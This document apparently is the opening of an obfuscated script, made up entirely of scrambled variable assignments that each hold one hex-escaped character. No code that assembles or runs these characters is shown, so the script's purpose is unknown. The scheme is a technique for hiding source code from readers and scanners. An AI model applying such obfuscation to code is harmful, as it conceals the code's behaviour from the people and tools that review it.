$jikd1416="\x69";
$jikd815="\x6c";$jikd1231="\x5b";$jikd279="\x72";$jikd826="\x09";$jikd917="\x24";$jikd1445="\x20";
$jikd360="\x73";$jikd236="\x24";$jikd225="\x28";$jikd1459="\x20";$jikd248="\x3b";$jikd1202="\x29";$jikd1174="\x7b";$jikd1351="\x22";$jikd616="\x0a";$jikd1036="\x6e";$jikd1124="\x7b";$jikd490="\x20";$jikd422="\x64";$jikd1042="\x22";$jikd855="\x6f";$jikd861="\x20";$jikd510="\x65";$jikd1356="\x66";$jikd1313="\x6d";$jikd1190="\x72";
$jikd240="\x65";$jikd1245="\x31";$jikd231="\x29";$jikd827="\x24";$jikd19="\x6f";$jikd921="\x3b";$jikd1081="\x65";$jikd452="\x6b";$jikd745="\x6d";$jikd436="\x61";
$jikd1023="\x3d";$jikd1287="\x09";$jikd325="\x69";$jikd860="\x69";$jikd1069="\x6e";$jikd190="\x73";$jikd1150="\x72";$jikd574="\x76";$jikd1094="\x0a";
$jikd515="\x65";$jikd1471="\x75";
$jikd1381="\x2b";$jikd649="\x24";$jikd1686="\x63";$jikd577="\x5f";$jikd1473="\x73";$jikd119="\x6c";$jikd488="\x61";$jikd1083="\x75";$jikd1614="\x0a";$jikd92="\x6f";$jikd1582="\x24";$jikd952="\x6e";$jikd599="\x0a";$jikd1578="\x20";$jikd304="\x63";$jikd1553="\x0a";$jikd713="\x65";$jikd1544="\x63";$jikd338="\x6f";$jikd120="\x6c";$jikd1539="\x20";$jikd1343="\x74";$jikd1273="\x40";$jikd590="\x73";
$jikd1252="\x69";$jikd721="\x2c";$jikd1306="\x69";$jikd694="\x3b";$jikd513="\x61";$jikd1423="\x64";$jikd800="\x23";
$jikd106="\x73";$jikd685="\x5c";$jikd343="\x20";$jikd1095="\x7d";$jikd109="\x65";$jikd1550="\x69";$jikd97="\x41";$jikd805="\x63";$jikd781="\x29";$jikd551="\x40";$jikd399="\x6e";$jikd502="\x72";
$jikd1506="\x6f";$jikd618="\x66";$jikd1562="\x77";$jikd491="\x72";$jikd426="\x7a";$jikd1533="\x20";
$jikd128="\x72";$jikd1345="\x69";
$jikd476="\x74";$jikd1177="\x09";
$jikd1303="\x73";$jikd1559="\x67";$jikd1352="\x22";$jikd1698="\x61";$jikd1341="\x24";
$jikd344="\x2b";$jikd288="\x68";$jikd792="\x29";
$jikd518="\x09";$jikd1047="\x6d";$jikd8="\x65";$jikd927="\x63";$jikd1236="\x24";$jikd1563="\x69";$jikd910="\x6e";$jikd954="\x28";$jikd1527="\x6f";$jikd1098="\x0a";$jikd758="\x20";$jikd249="\x0a";
$jikd1552="\x65";$jikd134="\x65";$jikd1673="\x6c";$jikd717="\x5b";$jikd1436="\x7d";$jikd1504="\x20";$jikd1639="\x6e";$jikd5="\x65";$jikd440="\x79";$jikd967="\x29";$jikd772="\x74";$jikd1275="\x61";
$jikd154="\x09";$jikd175="\x79";$jikd1543="\x20";$jikd1298="\x72";$jikd965="\x29";$jikd1390="\x09";$jikd959="\x28";$jikd645="\x3b";$jikd1019="\x64";$jikd567="\x3d";$jikd434="\x74";$jikd482="\x6f";$jikd1409="\x28";$jikd1710="\x24";
$jikd690="\x32";
$jikd1464="\x20";$jikd785="\x29";$jikd1389="\x09";$jikd733="\x74";$jikd888="\x7b";$jikd441="\x2c";$jikd87="\x76";$jikd1410="\x22";$jikd69="\x6f";$jikd612="\x20";$jikd642="\x69";$jikd867="\x24";$jikd1292="\x0a";$jikd631="\x24";$jikd76="\x6e";
$jikd1675="\x73";$jikd548="\x2c";$jikd1096="\x0a";$jikd1361="\x6d";$jikd863="\x20";$jikd321="\x30";$jikd613="\x22";$jikd259="\x20";$jikd1072="\x65";$jikd943="\x28";$jikd818="\x20";$jikd125="\x74";$jikd997="\x61";$jikd550="\x5c";$jikd845="\x6e";$jikd1132="\x61";$jikd1050="\x64";$jikd542="\x73";
$jikd1566="\x20";
$jikd1232="\x24";$jikd377="\x6f";$jikd1472="\x72";$jikd946="\x69";$jikd531="\x5f";
$jikd569="\x30";$jikd299="\x74";$jikd347="\x69";$jikd254="\x62";$jikd1290="\x7d";$jikd798="\x0a";$jikd571="\x0a";$jikd485="\x65";$jikd307="\x70";
$jikd1060="\x6c";$jikd534="\x75";$jikd1576="\x61";$jikd729="\x63";$jikd1049="\x6f";$jikd655="\x09";$jikd808="\x61";$jikd1269="\x5d";$jikd341="\x29";$jikd273="\x68";$jikd875="\x63";$jikd1149="\x6f";$jikd1631="\x70";$jikd1129="\x20";
$jikd1369="\x30";$jikd751="\x2e";$jikd186="\x6d";$jikd1176="\x09";$jikd768="\x20";$jikd179="\x20";$jikd1645="\x67";
$jikd988="\x3d";$jikd1404="\x72";$jikd164="\x3d";$jikd205="\x6e";$jikd1193="\x64";$jikd1622="\x22";$jikd212="\x3d";
$jikd247="\x29";
$jikd980="\x24";$jikd1120="\x66";$jikd1091="\x64";$jikd218="\x0a";$jikd1228="\x24";$jikd1677="\x20";
$jikd553="\x6e";$jikd1117="\x68";$jikd794="\x0a";$jikd636="\x20";$jikd309="\x0a";$jikd1370="\x3b";
$jikd565="\x69";$jikd1548="\x2d";
$jikd1071="\x6d";$jikd1635="\x76";
$jikd1547="\x65";$jikd1691="\x2b";$jikd1634="\x24";$jikd1130="\x28";$jikd1465="\x69";$jikd296="\x6c";$jikd841="\x76";$jikd1443="\x72";$jikd183="\x3b";$jikd1647="\x6e";
$jikd755="\x5c";$jikd461="\x77";$jikd385="\x20";$jikd780="\x30";$jikd1126="\x09";$jikd1045="\x09";
$jikd828="\x6d";$jikd1213="\x66";$jikd1079="\x09";$jikd1420="\x72";$jikd790="\x20";$jikd942="\x20";$jikd420="\x61";$jikd1037="\x61";$jikd414="\x0a";$jikd114="\x65";$jikd692="\x5c";$jikd1359="\x20";
$jikd753="\x20";$jikd208="\x78";$jikd78="\x72";$jikd136="\x2e";
$jikd1468="\x72";$jikd152="\x7b";$jikd512="\x6c";$jikd588="\x64";$jikd684="\x22";$jikd742="\x09";$jikd976="\x09";$jikd1125="\x0a";$jikd1521="\x74";$jikd1469="\x65";$jikd1706="\x76";$jikd978="\x0a";$jikd1589="\x65";$jikd1247="\x24";$jikd284="\x72";$jikd117="\x20";$jikd627="\x20";$jikd350="\x7b";$jikd1235="\x20";$jikd21="\x65";$jikd885="\x69";$jikd680="\x25";
$jikd1291="\x0a";$jikd229="\x65";$jikd831="\x64";
$jikd1373="\x69";
$jikd1537="\x63";$jikd650="\x69";
$jikd95="\x23";$jikd367="\x20";$jikd837="\x22";$jikd1700="\x69";$jikd1242="\x40";$jikd1255="\x0a";$jikd1483="\x20";$jikd36="\x6e";$jikd33="\x6e";
$jikd194="\x70";$jikd1272="\x20";$jikd771="\x6e";$jikd14="\x65";$jikd560="\x3b";$jikd234="\x24";
$jikd882="\x2b";$jikd529="\x65";$jikd1284="\x5d";$jikd46="\x39";$jikd532="\x73";$jikd220="\x73";$jikd715="\x65";$jikd950="\x28";$jikd100="\x20";$jikd1375="\x3c";$jikd207="\x65";
$jikd301="\x65";$jikd1169="\x24";
$jikd1207="\x6e";$jikd665="\x3d";
$jikd872="\x24";$jikd848="\x65";$jikd1457="\x0a";$jikd439="\x61";$jikd181="\x20";$jikd1078="\x0a";$jikd1172="\x29";$jikd1692="\x24";
$jikd886="\x29";$jikd342="\x3b";$jikd1408="\x66";$jikd663="\x20";$jikd1312="\x09";$jikd1195="\x24";$jikd1084="\x72";$jikd1648="\x65";$jikd176="\x20";$jikd1394="\x72";$jikd1629="\x6f";$jikd99="\x6c";$jikd912="\x6d";$jikd144="\x74";$jikd451="\x63";$jikd821="\x72";$jikd94="\x0a";$jikd1580="\x29";$jikd1418="\x74";$jikd854="\x66";$jikd1475="\x76";$jikd621="\x20";
$jikd174="\x6d";$jikd1505="\x63";$jikd587="\x6e";
$jikd1003="\x65";$jikd1119="\x66";$jikd168="\x69";
$jikd993="\x22";$jikd1488="\x73";$jikd652="\x20";$jikd1265="\x2c";$jikd1180="\x20";$jikd352="\x09";
$jikd178="\x69";$jikd1606="\x69";
$jikd193="\x69";$jikd677="\x24";$jikd1565="\x67";$jikd1433="\x3b";$jikd1368="\x20";$jikd458="\x6f";$jikd598="\x3b";$jikd904="\x24";
$jikd630="\x20";$jikd1191="\x61";
$jikd1564="\x6e";$jikd625="\x20";$jikd1260="\x61";$jikd497="\x64";$jikd1638="\x5f";$jikd576="\x72";$jikd34="\x67";$jikd40="\x43";
$jikd1587="\x20";$jikd1141="\x3d";$jikd88="\x65";$jikd365="\x74";$jikd916="\x22";$jikd113="\x76";$jikd838="\x5c";
$jikd291="\x68";
$jikd896="\x64";$jikd1203="\x3b";$jikd1014="\x09";$jikd124="\x66";$jikd103="\x67";
$jikd1285="\x3b";$jikd397="\x40";$jikd1588="\x6d";
$jikd1656="\x29";$jikd1682="\x63";$jikd148="\x72";$jikd1546="\x64";
$jikd258="\x64";$jikd184="\x0a";$jikd448="\x74";$jikd1350="\x20";$jikd1214="\x20";$jikd1135="\x20";$jikd819="\x73";$jikd592="\x72";
$jikd951="\x69";$jikd925="\x24";$jikd1029="\x3d";
$jikd1118="\x75";$jikd1270="\x20";
$jikd1000="\x6e";$jikd686="\x5c";$jikd691="\x78";$jikd1331="\x29";$jikd290="\x63";$jikd773="\x28";
$jikd493="\x62";
$jikd1604="\x70";$jikd1063="\x24";$jikd188="\x20";$jikd797="\x0a";$jikd908="\x72";$jikd752="\x3d";$jikd1382="\x2b";$jikd2="\x6d";$jikd1051="\x65";$jikd460="\x20";$jikd1490="\x79";$jikd709="\x24";
$jikd1328="\x64";$jikd262="\x20";$jikd869="\x20";$jikd387="\x29";
$jikd756="\x6e";$jikd874="\x73";
$jikd1709="\x20";$jikd657="\x24";$jikd191="\x63";$jikd272="\x74";$jikd1034="\x72";
$jikd1715="\x0a";
$jikd398="\x69";$jikd1517="\x6e";$jikd1076="\x0a";$jikd1110="\x79";$jikd1243="\x24";$jikd105="\x74";$jikd1325="\x72";$jikd559="\x29";$jikd1212="\x69";$jikd1575="\x69";$jikd870="\x3c";$jikd1337="\x09";$jikd505="\x74";$jikd1556="\x69";
$jikd990="\x22";$jikd75="\x65";$jikd948="\x25";$jikd1520="\x61";$jikd1654="\x6e";$jikd1510="\x74";$jikd300="\x68";$jikd1048="\x63";$jikd1514="\x20";$jikd1591="\x61";
$jikd1296="\x62";$jikd1417="\x6e";
$jikd672="\x74";$jikd1264="\x69";
$jikd239="\x6e";$jikd156="\x79";$jikd674="\x28";$jikd1661="\x69";
$jikd111="\x65";$jikd1230="\x31";$jikd1018="\x6f";$jikd520="\x69";
$jikd1593="\x6f";$jikd1358="\x72";$jikd744="\x24";$jikd313="\x72";$jikd540="\x5c";$jikd1127="\x6d";$jikd478="\x65";$jikd266="\x61";$jikd54="\x69";
$jikd1448="\x74";$jikd1121="\x6c";$jikd628="\x30";
$jikd1185="\x20";
$jikd1585="\x20";$jikd1241="\x20";$jikd1259="\x24";$jikd437="\x72";$jikd862="\x3d";
$jikd1474="\x69";$jikd698="\x24";$jikd116="\x2c";$jikd839="\x24";$jikd224="\x64";$jikd1311="\x0a";
$jikd328="\x20";$jikd1573="\x6e";$jikd242="\x61";$jikd1621="\x2c";$jikd1687="\x22";$jikd274="\x65";$jikd701="\x72";$jikd1062="\x5c";$jikd1399="\x2e";
$jikd901="\x20";
$jikd1705="\x65";$jikd1348="\x20";
$jikd558="\x73";$jikd263="\x61";$jikd722="\x20";
$jikd375="\x24";$jikd865="\x3b";$jikd305="\x72";$jikd195="\x74";$jikd1099="\x73";$jikd1059="\x61";
$jikd22="\x20";$jikd1025="\x22";$jikd1140="\x20";$jikd84="\x2d";$jikd57="\x20";$jikd1066="\x61";$jikd597="\x29";$jikd499="\x63";$jikd197="\x3d";$jikd1513="\x34";$jikd211="\x20";$jikd1518="\x65";$jikd1067="\x72";
$jikd1617="\x65";$jikd770="\x69";
$jikd939="\x20";$jikd1371="\x20";$jikd789="\x3d";$jikd676="\x5c";$jikd699="\x76";
$jikd1502="\x0a";$jikd79="\x61";$jikd1309="\x0a";$jikd824="\x67";$jikd1396="\x6e";$jikd1310="\x7b";$jikd1011="\x3b";$jikd1329="\x28";$jikd1347="\x67";$jikd669="\x72";$jikd747="\x6f";$jikd1015="\x24";
$jikd373="\x72";
$jikd801="\x20";$jikd286="\x20";$jikd919="\x2e";$jikd1093="\x3b";$jikd484="\x77";$jikd1655="\x22";$jikd1453="\x3b";$jikd659="\x63";
$jikd607="\x6f";$jikd1379="\x3b";$jikd319="\x3d";$jikd1085="\x6e";$jikd1659="\x70";$jikd1618="\x6e";$jikd705="\x6d";$jikd372="\x74";$jikd836="\x20";$jikd312="\x6f";$jikd810="\x65";$jikd228="\x6d";$jikd1012="\x0a";$jikd364="\x70";
$jikd1456="\x0a";$jikd536="\x66";$jikd1137="\x61";$jikd1192="\x6e";$jikd1183="\x20";$jikd1477="\x20";
$jikd533="\x68";$jikd876="\x72";$jikd1523="\x6f";
$jikd340="\x65";$jikd600="\x09";$jikd1568="\x78";$jikd405="\x2c";$jikd776="\x6e";$jikd928="\x6f";
$jikd1412="\x63";$jikd637="\x24";$jikd857="\x20";$jikd1414="\x2c";$jikd974="\x3b";
$jikd1251="\x24";$jikd1104="\x69";$jikd517="\x0a";$jikd883="\x2b";$jikd501="\x72";$jikd199="\x28";$jikd410="\x0a";
$jikd500="\x6f";
$jikd1542="\x65";$jikd1366="\x20";$jikd1402="\x73";
$jikd843="\x72";
$jikd924="\x09";$jikd1035="\x5f";$jikd7="\x70";$jikd16="\x6c";$jikd1353="\x3b";$jikd469="\x6c";
$jikd10="\x72";$jikd573="\x24";
$jikd842="\x61";$jikd543="\x63";$jikd354="\x70";$jikd390="\x09";$jikd1001="\x61";$jikd131="\x65";$jikd1153="\x6d";$jikd82="\x6f";$jikd526="\x79";$jikd1181="\x24";$jikd1678="\x4f";$jikd1342="\x73";
$jikd382="\x24";$jikd60="\x61";$jikd940="\x69";$jikd11="\x6c";
$jikd1374="\x20";$jikd1308="\x67";$jikd647="\x2b";$jikd253="\x20";$jikd564="\x24";$jikd1146="\x0a";$jikd1557="\x73";
$jikd1455="\x7d";$jikd784="\x29";
$jikd667="\x73";$jikd316="\x24";$jikd1179="\x79";
$jikd970="\x3d";$jikd466="\x75";$jikd1002="\x6d";$jikd541="\x40";$jikd63="\x65";$jikd714="\x78";$jikd1512="\x20";$jikd582="\x20";$jikd898="\x20";$jikd455="\x6e";$jikd1532="\x2c";$jikd968="\x20";$jikd1528="\x72";$jikd1194="\x28";$jikd1305="\x72";$jikd994="\x2e";$jikd1178="\x6d";$jikd537="\x6c";$jikd378="\x64";$jikd1447="\x73";$jikd267="\x79";$jikd903="\x5c";
$jikd1324="\x28";$jikd688="\x25";$jikd1571="\x6e";$jikd1695="\x6e";$jikd151="\x0a";$jikd1454="\x0a";$jikd112="\x72";$jikd1218="\x3d";$jikd1430="\x37";$jikd200="\x29";$jikd615="\x3b";$jikd853="\x09";
$jikd320="\x20";$jikd50="\x62";
$jikd1301="\x64";$jikd723="\x6f";$jikd56="\x6e";$jikd731="\x69";$jikd1625="\x65";$jikd421="\x6e";$jikd726="\x28";$jikd1519="\x72";$jikd589="\x5f";$jikd425="\x69";$jikd1480="\x64";$jikd345="\x2b";$jikd481="\x73";$jikd1499="\x63";$jikd1704="\x0a";$jikd1199="\x20";
$jikd662="\x65";
$jikd139="\x75";$jikd507="\x63";$jikd1466="\x73";$jikd480="\x20";$jikd227="\x69";$jikd459="\x77";$jikd456="\x20";$jikd1555="\x20";$jikd1089="\x63";$jikd277="\x68";$jikd892="\x24";$jikd1280="\x2c";$jikd127="\x20";$jikd475="\x20";$jikd201="\x2c";$jikd28="\x69";
$jikd23="\x6d";$jikd252="\x23";$jikd214="\x28";$jikd608="\x64";$jikd1017="\x63";$jikd1279="\x6a";$jikd793="\x3b";$jikd389="\x0a";
$jikd1322="\x6e";
$jikd1300="\x6e";$jikd336="\x24";$jikd1560="\x72";$jikd920="\x22";$jikd202="\x20";$jikd419="\x72";$jikd1696="\x65";$jikd1507="\x6d";$jikd739="\x29";$jikd849="\x3d";
$jikd1268="\x6a";$jikd121="\x20";$jikd856="\x72";$jikd150="\x68";
$jikd725="\x64";$jikd1334="\x32";$jikd847="\x6d";$jikd1613="\x3b";
$jikd256="\x69";$jikd1608="\x74";$jikd580="\x6d";$jikd386="\x31";
$jikd1676="\x65";
$jikd53="\x74";$jikd1068="\x5f";
$jikd1315="\x20";
$jikd158="\x24";$jikd656="\x09";$jikd1701="\x6f";$jikd110="\x73";
$jikd1184="\x3d";$jikd1391="\x24";$jikd711="\x6e";$jikd333="\x74";$jikd1697="\x72";$jikd285="\x73";$jikd1428="\x2b";$jikd782="\x2b";$jikd732="\x70";$jikd232="\x25";
$jikd1229="\x61";$jikd1530="\x73";$jikd245="\x6f";
$jikd141="\x20";$jikd1154="\x79";$jikd639="\x73";
$jikd525="\x5f";$jikd670="\x69";
$jikd1039="\x65";$jikd430="\x63";$jikd370="\x62";
$jikd706="\x65";
$jikd1487="\x6e";$jikd991="\x5c";
$jikd357="\x68";$jikd1204="\x0a";$jikd1444="\x6e";$jikd508="\x6f";$jikd66="\x23";$jikd1013="\x0a";$jikd219="\x09";$jikd858="\x28";$jikd1438="\x09";
$jikd1283="\x69";$jikd24="\x6f";$jikd913="\x65";$jikd834="\x2e";$jikd1004="\x2e";$jikd519="\x66";$jikd823="\x6e";$jikd734="\x5b";$jikd671="\x6e";
$jikd516="\x72";$jikd958="\x64";$jikd538="\x65";$jikd104="\x68";$jikd153="\x0a";$jikd165="\x20";
$jikd381="\x20";$jikd1294="\x73";
$jikd1707="\x61";$jikd118="\x61";$jikd1508="\x70";$jikd167="\x68";
$jikd62="\x6d";
$jikd1222="\x6a";$jikd102="\x69";
$jikd1205="\x09";
$jikd945="\x24";$jikd624="\x69";$jikd1501="\x6e";$jikd468="\x66";$jikd813="\x76";$jikd767="\x25";$jikd1065="\x76";$jikd774="\x72";$jikd1216="\x69";$jikd335="\x28";$jikd1495="\x6e";
$jikd578="\x6e";$jikd1070="\x61";$jikd189="\x40";
$jikd1411="\x25";
$jikd918="\x69";$jikd547="\x74";
$jikd626="\x3d";$jikd142="\x6d";$jikd762="\x28";
$jikd474="\x23";$jikd1147="\x09";$jikd371="\x73";$jikd750="\x20";
$jikd832="\x65";$jikd411="\x09";
$jikd415="\x0a";$jikd866="\x20";
$jikd1481="\x65";
$jikd159="\x63";
$jikd796="\x7d";$jikd757="\x22";$jikd563="\x09";$jikd1335="\x3b";$jikd1652="\x69";$jikd438="\x72";$jikd1106="\x68";$jikd1703="\x3b";$jikd330="\x65";$jikd43="\x32";
$jikd622="\x28";$jikd1694="\x65";$jikd999="\x5f";$jikd638="\x23";$jikd161="\x64";$jikd949="\x20";$jikd1221="\x24";
$jikd492="\x65";$jikd1561="\x6f";$jikd644="\x74";
$jikd594="\x6e";$jikd204="\x69";$jikd1526="\x20";$jikd1064="\x24";$jikd138="\x73";$jikd306="\x69";$jikd703="\x6e";$jikd1055="\x20";
$jikd530="\x73";$jikd349="\x20";$jikd539="\x28";$jikd617="\x09";$jikd348="\x29";
$jikd1386="\x20";$jikd1041="\x3b";$jikd302="\x20";$jikd48="\x53";$jikd1217="\x20";$jikd1107="\x65";$jikd331="\x6e";
$jikd1053="\x2e";$jikd596="\x28";
$jikd1090="\x6f";$jikd1653="\x6f";
$jikd931="\x20";$jikd1632="\x68";$jikd1286="\x0a";
$jikd763="\x28";$jikd251="\x09";$jikd1529="\x20";$jikd1162="\x24";$jikd496="\x6c";
$jikd1658="\x0a";$jikd765="\x69";
$jikd1261="\x32";$jikd1363="\x20";
$jikd89="\x72";$jikd1642="\x65";$jikd1209="\x78";$jikd1640="\x61";$jikd1524="\x6e";$jikd746="\x63";$jikd735="\x24";$jikd696="\x2c";$jikd1123="\x0a";$jikd1577="\x6c";$jikd1271="\x3d";$jikd884="\x24";$jikd334="\x68";
$jikd718="\x24";$jikd1159="\x3d";$jikd1442="\x75";$jikd1605="\x72";$jikd59="\x72";
$jikd1030="\x27";$jikd1223="\x3b";$jikd1007="\x2e";$jikd1317="\x6c";$jikd45="\x30";$jikd1173="\x20";
$jikd859="\x24";$jikd1415="\x20";
$jikd1167="\x2d";$jikd710="\x69";$jikd1579="\x3a";$jikd1188="\x74";$jikd400="\x64";$jikd1319="\x3d";$jikd1598="\x24";$jikd126="\x73";
$jikd1249="\x2c";$jikd1031="\x24";$jikd432="\x69";$jikd346="\x24";
$jikd679="\x73";$jikd463="\x20";$jikd163="\x20";$jikd666="\x20";
$jikd1082="\x74";$jikd91="\x69";
$jikd556="\x78";$jikd1237="\x6a";
$jikd852="\x0a";$jikd1022="\x2e";
$jikd719="\x69";$jikd648="\x2b";
$jikd1650="\x61";$jikd992="\x24";$jikd1486="\x61";$jikd1388="\x0a";$jikd394="\x73";$jikd635="\x3d";$jikd802="\x63";$jikd383="\x69";
$jikd1628="\x6d";$jikd39="\x28";$jikd906="\x76";$jikd1461="\x68";$jikd1028="\x63";$jikd122="\x6c";$jikd523="\x65";$jikd634="\x3c";$jikd1649="\x72";$jikd427="\x65";
$jikd511="\x20";
$jikd761="\x20";$jikd787="\x20";$jikd1397="\x67";
$jikd1362="\x79";
$jikd428="\x20";$jikd581="\x65";$jikd1664="\x20";$jikd629="\x3b";$jikd1320="\x20";
$jikd1111="\x61";$jikd557="\x65";$jikd816="\x28";
$jikd166="\x73";$jikd825="\x0a";$jikd337="\x63";
$jikd1220="\x20";$jikd1046="\x24";$jikd30="\x67";$jikd1145="\x3b";$jikd1662="\x6e";$jikd522="\x68";$jikd955="\x72";$jikd1644="\x24";$jikd470="\x65";$jikd1626="\x74";$jikd1088="\x6d";
$jikd1357="\x6f";$jikd293="\x62";$jikd611="\x3d";$jikd339="\x64";$jikd524="\x72";$jikd169="\x66";$jikd1398="\x20";$jikd223="\x6e";$jikd1263="\x24";$jikd682="\x3d";$jikd1233="\x69";$jikd1033="\x61";$jikd1131="\x24";
$jikd1482="\x2c";$jikd754="\x22";$jikd1200="\x31";$jikd1627="\x61";$jikd454="\x6f";$jikd1175="\x0a";$jikd326="\x20";$jikd868="\x69";$jikd1426="\x30";$jikd1522="\x69";
$jikd1429="\x39";$jikd278="\x61";$jikd1262="\x5b";$jikd929="\x64";$jikd777="\x64";
$jikd1157="\x69";$jikd473="\x09";$jikd1680="\x0a";$jikd973="\x29";$jikd355="\x75";$jikd1364="\x24";$jikd1234="\x2c";$jikd1422="\x6e";$jikd1690="\x2b";$jikd969="\x3d";$jikd708="\x20";$jikd938="\x22";$jikd395="\x68";$jikd807="\x6c";$jikd1431="\x29";$jikd243="\x74";$jikd209="\x65";$jikd65="\x0a";$jikd192="\x72";$jikd1166="\x20";$jikd1672="\x63";
$jikd1549="\x73";
$jikd593="\x69";$jikd1671="\x0a";$jikd1584="\x63";
$jikd1240="\x3d";$jikd660="\x6f";$jikd899="\x2e";$jikd614="\x22";
$jikd1616="\x70";$jikd1406="\x6e";$jikd1215="\x24";$jikd215="\x29";$jikd315="\x28";$jikd1043="\x3b";$jikd1367="\x3d";$jikd68="\x63";$jikd283="\x65";$jikd268="\x20";$jikd160="\x6f";$jikd417="\x23";$jikd442="\x20";
$jikd1689="\x0a";$jikd13="\x50";$jikd269="\x6f";
$jikd606="\x63";$jikd1326="\x61";$jikd640="\x63";$jikd1152="\x28";$jikd379="\x65";$jikd1599="\x24";
$jikd1009="\x3b";$jikd769="\x28";$jikd198="\x20";$jikd1302="\x5f";$jikd133="\x73";
$jikd509="\x64";$jikd172="\x0a";$jikd987="\x2e";$jikd275="\x20";$jikd1535="\x69";
$jikd1102="\x20";$jikd962="\x29";$jikd1485="\x65";$jikd83="\x6e";$jikd704="\x61";
$jikd20="\x64";$jikd1494="\x6f";$jikd318="\x20";
$jikd155="\x6d";$jikd1702="\x6e";$jikd545="\x69";$jikd1032="\x76";
$jikd1393="\x74";$jikd396="\x20";$jikd1336="\x0a";
$jikd566="\x20";
$jikd1201="\x29";$jikd280="\x61";$jikd132="\x72";$jikd213="\x20";$jikd329="\x6c";$jikd1155="\x20";$jikd294="\x75";$jikd846="\x61";
$jikd1143="\x40";$jikd281="\x63";$jikd498="\x20";$jikd1525="\x73";$jikd1182="\x6a";
$jikd42="\x20";$jikd728="\x73";$jikd737="\x5d";
$jikd840="\x24";
$jikd1623="\x3e";$jikd610="\x20";$jikd310="\x09";$jikd356="\x73";$jikd289="\x69";$jikd464="\x73";$jikd1163="\x61";
$jikd683="\x5c";$jikd926="\x6d";$jikd1128="\x79";$jikd1470="\x63";
$jikd47="\x20";$jikd702="\x5f";$jikd1460="\x74";$jikd1572="\x65";$jikd77="\x65";$jikd830="\x6f";$jikd486="\x20";$jikd984="\x64";$jikd1440="\x65";$jikd361="\x63";
$jikd431="\x72";$jikd241="\x72";$jikd759="\x69";$jikd446="\x70";$jikd1597="\x28";$jikd143="\x65";$jikd902="\x22";$jikd74="\x67";$jikd1392="\x73";$jikd575="\x61";$jikd37="\x65";$jikd1432="\x29";$jikd1101="\x62";$jikd1165="\x3b";$jikd412="\x7d";$jikd297="\x64";$jikd64="\x72";$jikd1421="\x61";
$jikd1008="\x22";
$jikd633="\x20";
$jikd1479="\x6f";$jikd1583="\x6e";
$jikd1400="\x3d";$jikd1134="\x2c";$jikd260="\x61";$jikd282="\x74";
$jikd909="\x5f";$jikd182="\x30";$jikd157="\x20";$jikd1531="\x6f";$jikd681="\x64";$jikd844="\x5f";$jikd1511="\x65";$jikd246="\x6e";$jikd956="\x61";
$jikd1586="\x3d";$jikd146="\x6d";$jikd1024="\x20";$jikd327="\x3c";$jikd1080="\x72";
$jikd1239="\x20";$jikd1170="\x69";
$jikd210="\x73";$jikd1534="\x73";
$jikd435="\x20";$jikd1699="\x74";$jikd766="\x20";$jikd237="\x67";$jikd591="\x74";$jikd620="\x72";$jikd1281="\x20";$jikd292="\x20";$jikd17="\x20";$jikd445="\x65";$jikd129="\x65";$jikd489="\x6e";
$jikd1657="\x3b";$jikd1569="\x70";$jikd1295="\x75";$jikd96="\x20";$jikd1005="\x24";$jikd1027="\x24";$jikd1439="\x72";$jikd449="\x72";$jikd80="\x74";$jikd1407="\x74";
$jikd1666="\x20";$jikd147="\x6f";$jikd376="\x63";$jikd401="\x65";$jikd880="\x3b";$jikd1601="\x29";
$jikd1449="\x72";$jikd1208="\x65";
$jikd1289="\x0a";
$jikd206="\x64";$jikd804="\x6c";$jikd712="\x64";$jikd1596="\x68";$jikd1136="\x24";
$jikd609="\x65";$jikd413="\x0a";$jikd409="\x3b";$jikd887="\x20";$jikd196="\x20";$jikd1493="\x20";$jikd697="\x20";$jikd1708="\x6c";$jikd941="\x66";$jikd1021="\x20";
$jikd833="\x20";$jikd450="\x61";$jikd775="\x61";$jikd31="\x20";$jikd972="\x30";$jikd1403="\x70";$jikd602="\x79";$jikd814="\x61";$jikd1020="\x65";$jikd187="\x79";$jikd15="\x72";$jikd1108="\x72";$jikd944="\x28";$jikd1224="\x0a";$jikd1075="\x3b";$jikd1016="\x6d";$jikd9="\x61";$jikd1463="\x73";$jikd894="\x63";$jikd1151="\x20";
$jikd1142="\x20";$jikd1346="\x6e";$jikd760="\x66";$jikd270="\x66";$jikd1646="\x65";$jikd1113="\x65";$jikd651="\x29";$jikd1226="\x09";$jikd135="\x64";$jikd687="\x78";$jikd1227="\x40";$jikd653="\x7b";$jikd1138="\x32";$jikd966="\x29";$jikd1116="\x73";$jikd255="\x75";$jikd471="\x64";$jikd408="\x69";$jikd265="\x72";$jikd1164="\x31";
$jikd1620="\x4f";$jikd72="\x74";
$jikd1100="\x75";
$jikd1161="\x40";$jikd783="\x31";$jikd1144="\x5f";$jikd416="\x09";$jikd368="\x73";
$jikd1624="\x6d";$jikd276="\x63";
$jikd1040="\x27";$jikd730="\x72";$jikd393="\x75";$jikd1026="\x5c";$jikd1219="\x3d";$jikd1498="\x20";$jikd1056="\x22";
$jikd226="\x74";$jikd1446="\x24";$jikd1052="\x20";
$jikd877="\x69";$jikd1327="\x6e";$jikd871="\x20";$jikd528="\x74";$jikd359="\x40";$jikd953="\x74";$jikd1405="\x69";$jikd1637="\x72";$jikd1441="\x74";$jikd1086="\x20";$jikd738="\x29";$jikd996="\x76";$jikd264="\x72";$jikd799="\x09";$jikd923="\x09";$jikd1467="\x20";$jikd1492="\x75";$jikd741="\x0a";$jikd1378="\x6c";$jikd1489="\x20";$jikd261="\x6e";$jikd1349="\x3d";$jikd1611="\x6e";
$jikd1503="\x23";$jikd495="\x69";$jikd778="\x28";$jikd180="\x3d";$jikd1293="\x0a";$jikd1105="\x73";$jikd1198="\x2b";
$jikd49="\x65";$jikd851="\x3b";$jikd668="\x70";$jikd177="\x24";
$jikd233="\x24";$jikd535="\x66";$jikd985="\x65";$jikd1354="\x0a";$jikd1515="\x67";$jikd1685="\x6e";$jikd483="\x20";$jikd889="\x0a";$jikd1103="\x66";$jikd216="\x3b";$jikd479="\x6d";$jikd1168="\x2d";$jikd568="\x20";$jikd1567="\x65";$jikd1714="\x0a";
$jikd605="\x6d";$jikd1266="\x20";$jikd554="\x64";$jikd1536="\x6e";$jikd26="\x70";$jikd740="\x3b";
$jikd101="\x72";$jikd549="\x20";$jikd897="\x65";$jikd1395="\x69";
$jikd1603="\x0a";$jikd1254="\x3b";$jikd1197="\x20";$jikd693="\x22";$jikd1681="\x24";$jikd1333="\x2b";$jikd1297="\x20";$jikd1665="\x4f";$jikd123="\x65";$jikd1424="\x28";$jikd1602="\x3b";$jikd1338="\x6d";$jikd1156="\x24";$jikd1641="\x6d";$jikd820="\x74";$jikd1497="\x79";
